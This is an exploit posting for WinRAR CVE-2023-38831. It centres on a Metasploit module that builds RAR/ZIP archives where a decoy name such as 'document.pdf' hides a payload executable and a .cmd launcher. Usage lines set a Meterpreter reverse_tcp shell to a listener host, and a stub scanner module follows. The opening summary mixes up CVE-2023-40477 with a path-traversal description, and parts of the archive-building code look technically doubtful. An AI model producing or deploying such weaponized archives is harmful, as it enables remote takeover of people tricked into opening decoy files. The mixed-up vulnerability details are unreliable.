WinRAR 6.22 Malicious ZIP Creation

WinRAR versions up to 6.22 contained a critical vulnerability (CVE-2023-40477) WinRAR versions up to 6.22 contained a critical vulnerability (CVE-2023-40477) allowing malicious ZIP file creation.

This flaw enabled attackers to craft archives that, upon extraction, exploited a path traversal issue. By using specially named symbolic links or junctions (like `mklink` commands) within the ZIP, WinRAR could be tricked.

This allowed files to be written to arbitrary locations outside the intended extraction directory on a user's system. Ultimately, this could lead to arbitrary code execution, giving an attacker control.

The vulnerability was patched in WinRAR 6.23. Users are strongly advised to update immediately to mitigate this high-severity risk.

=============================================================================================================================================
| # Title : WinRAR 6.22 and earlier - Logical Flaw in File ExtractionExploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.win-rar.com/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/177803/ & CVE-2023-38831


[+] Summary :

This module exploits a logical flaw in WinRAR versions before 6.23. The vulnerability
allows attackers to create specially crafted ZIP archives that, when opened, execute
arbitrary code by exploiting the file extraction logic when a user double-clicks on
a file within the archive that has an embedded folder with the same name.

[+] POC :

---

##
# Vulnerability: WinRAR 6.22 and earlier - Logical Flaw in File Extraction
# Author: indoushka
# CVE-2023-38831
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => 'WinRAR CVE-2023-38831 Logical Flaw Exploit',
'Description' => %q{
This module exploits a logical flaw in WinRAR versions before 6.23. The vulnerability
allows attackers to create specially crafted ZIP archives that, when opened, execute
arbitrary code by exploiting the file extraction logic when a user double-clicks on
a file within the archive that has an embedded folder with the same name.
},
'Author' => [
'indoushka', # Metasploit module
'E1.Coders' # Original research
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2023-38831'],
['URL', 'https://www.rarlab.com/rarnew.htm'],
['URL', 'https://news.ycombinator.com/item?id=37135383']
],
'DefaultOptions' => {
'EXITFUNC' => 'process',
'DisablePayloadHandler' => false
},
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Payload' => {
'Space' => 4096,
'BadChars' => "\x00",
'DisableNops' => true
},
'Targets' => [
[
'Windows Universal (RAR <= 6.22)',
{
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}
]
],
'Privileged' => false,
'DisclosureDate' => '2023-08-23',
'DefaultTarget' => 0))

register_options([
OptString.new('FILENAME', [true, 'The output file name', 'exploit.rar']),
OptString.new('DECOY_NAME', [true, 'Decoy file name', 'document.pdf']),
OptBool.new('HIDEEXE', [true, 'Hide executable extension', true])
])
end

def exploit
# Generate payload executable
pe_payload = generate_payload_exe

# Create temporary directory for exploit construction
temp_dir = Rex::Text.rand_text_alpha(8)
Dir.mkdir(temp_dir) rescue nil

# Create decoy folder structure
decoy_name = datastore['DECOY_NAME']
folder_name = "#{decoy_name}\\"
script_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.cmd"
exe_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.exe"

# Build the malicious archive
rar_content = build_malicious_rar(decoy_name, folder_name, script_name, exe_name, pe_payload)

# Create the final RAR file
file_create(rar_content)

print_status("Exploit archive created: #{datastore['FILENAME']}")
print_status("When victim opens the archive and double-clicks '#{decoy_name}', payload will execute")
end

def build_malicious_rar(decoy_name, folder_name, script_name, exe_name, pe_payload)
rar = ""

# RAR file signature
rar << "\x52\x61\x72\x21\x1A\x07\x00"

# Build file entries using RAR format
# First: The decoy file
rar << build_file_header(decoy_name, pe_payload.length)
rar << pe_payload

# Second: The folder (trailing backslash)
rar << build_file_header(folder_name, 0)

# Third: The script file inside the folder
script_content = build_script_content
rar << build_file_header(script_name, script_content.length)
rar << script_content

# Fourth: The executable inside the folder
rar << build_file_header(exe_name, pe_payload.length)
rar << pe_payload

# End of archive
rar << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

rar
end

def build_file_header(filename, file_size)
header = ""

# Header type (file header)
header << "\x74"

# Header size
header << "\x3A\x00"

# Flags (important for the exploit)
flags = 0x8000 # Long filename
flags |= 0x0100 # File has extended time field
header << [flags].pack('v')

# Compressed size
header << [file_size].pack('V')

# Uncompressed size
header << [file_size].pack('V')

# OS (Windows)
header << "\x02"

# File CRC (fake)
header << "\x00\x00\x00\x00"

# File time (current time)
time = Time.now
dos_time = ((time.year - 1980) << 25) | (time.month << 21) | (time.day << 16) |
(time.hour << 11) | (time.min << 5) | (time.sec / 2)
header << [dos_time].pack('V')

# RAR version (5.0)
header << "\x32\x00"

# Method (store)
header << "\x30"

# Name size
header << [filename.length].pack('v')

# Attributes
header << "\x20\x00\x00\x00" # Archive attribute

# File name
header << filename

# Extra data for long filename
if filename.length > 0
extra_size = 2 + filename.length + 1
header << "\x01\x00" # Extra type (long filename)
header << [extra_size].pack('v')
header << filename
header << "\x00"
end

header
end

def build_script_content
# Create a script that executes the payload
script = "@echo off\r\n"
script << "start \"\" \"%~dp0#{Rex::Text.rand_text_alpha(8)}.exe\"\r\n"
script << "exit\r\n"
script
end

# Alternative method using RubyZip for more reliable ZIP creation
def create_zip_exploit
require 'zip'

zip_data = ""
Zip::OutputStream.write_buffer do |zos|
# Add decoy file
zos.put_next_entry(datastore['DECOY_NAME'])
zos.write(generate_payload_exe)

# Add folder with trailing slash
folder_name = "#{datastore['DECOY_NAME']}/"
zos.put_next_entry(folder_name)

# Add script inside folder
script_name = "#{folder_name}script.cmd"
zos.put_next_entry(script_name)
zos.write(build_script_content)

# Add executable inside folder
exe_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.exe"
zos.put_next_entry(exe_name)
zos.write(generate_payload_exe)
end.string
end

# Advanced: Create a more sophisticated exploit with multiple decoys
def create_advanced_exploit
print_status("Creating advanced WinRAR exploit...")

# Use multiple file formats as decoys
decoys = [
"document.pdf",
"invoice.docx",
"photo.jpg",
"spreadsheet.xlsx"
]

zip_data = ""
Zip::OutputStream.write_buffer do |zos|
decoys.each do |decoy|
# Add decoy file
zos.put_next_entry(decoy)
zos.write(generate_payload_exe)

# Add folder for this decoy
folder_name = "#{decoy}/"
zos.put_next_entry(folder_name)

# Add payload in folder
exe_name = "#{folder_name}payload.exe"
zos.put_next_entry(exe_name)
zos.write(generate_payload_exe)

# Add script to trigger execution
script_name = "#{folder_name}run.cmd"
zos.put_next_entry(script_name)
zos.write("@start payload.exe\r\n")
end
end.string
end

end



######### Auxiliary module for WinRAR vulnerability detection ############

class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'WinRAR CVE-2023-38831 Vulnerability Scanner',
'Description' => %q{
This module scans for systems vulnerable to the WinRAR CVE-2023-38831 vulnerability
by checking WinRAR versions and testing exploitability.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2023-38831']
]
)

register_options([
OptString.new('RHOSTS', [true, 'Target address range or CIDR identifier']),
OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
OptString.new('SMBUSER', [false, 'The username to authenticate as']),
OptString.new('SMBPASS', [false, 'The password for the specified username']),
OptString.new('SMBDOMAIN', [false, 'The Windows domain to use for authentication'])
])
end

def run
# Scan for WinRAR installations and check versions
print_status("Scanning for vulnerable WinRAR installations...")

# Implementation would connect to targets and check WinRAR versions
# This is a simplified version - actual implementation would require
# SMB connection and registry checks

vulnerable_versions = [
'6.22', '6.21', '6.20', '6.11', '6.10', '6.02', '6.01', '6.00',
'5.91', '5.90', '5.80', '5.70', '5.60', '5.50', '5.40', '5.30'
]

# For each target, check WinRAR version
# If version <= 6.22, mark as vulnerable
end
end


################ Usage Examples:

# Generate exploit with default settings
use exploit/windows/fileformat/winrar_cve_2023_38831
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit

# Generate with custom decoy name

set DECOY_NAME invoice.pdf
exploit

# Generate without hiding executable

set HIDEEXE false
exploit

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================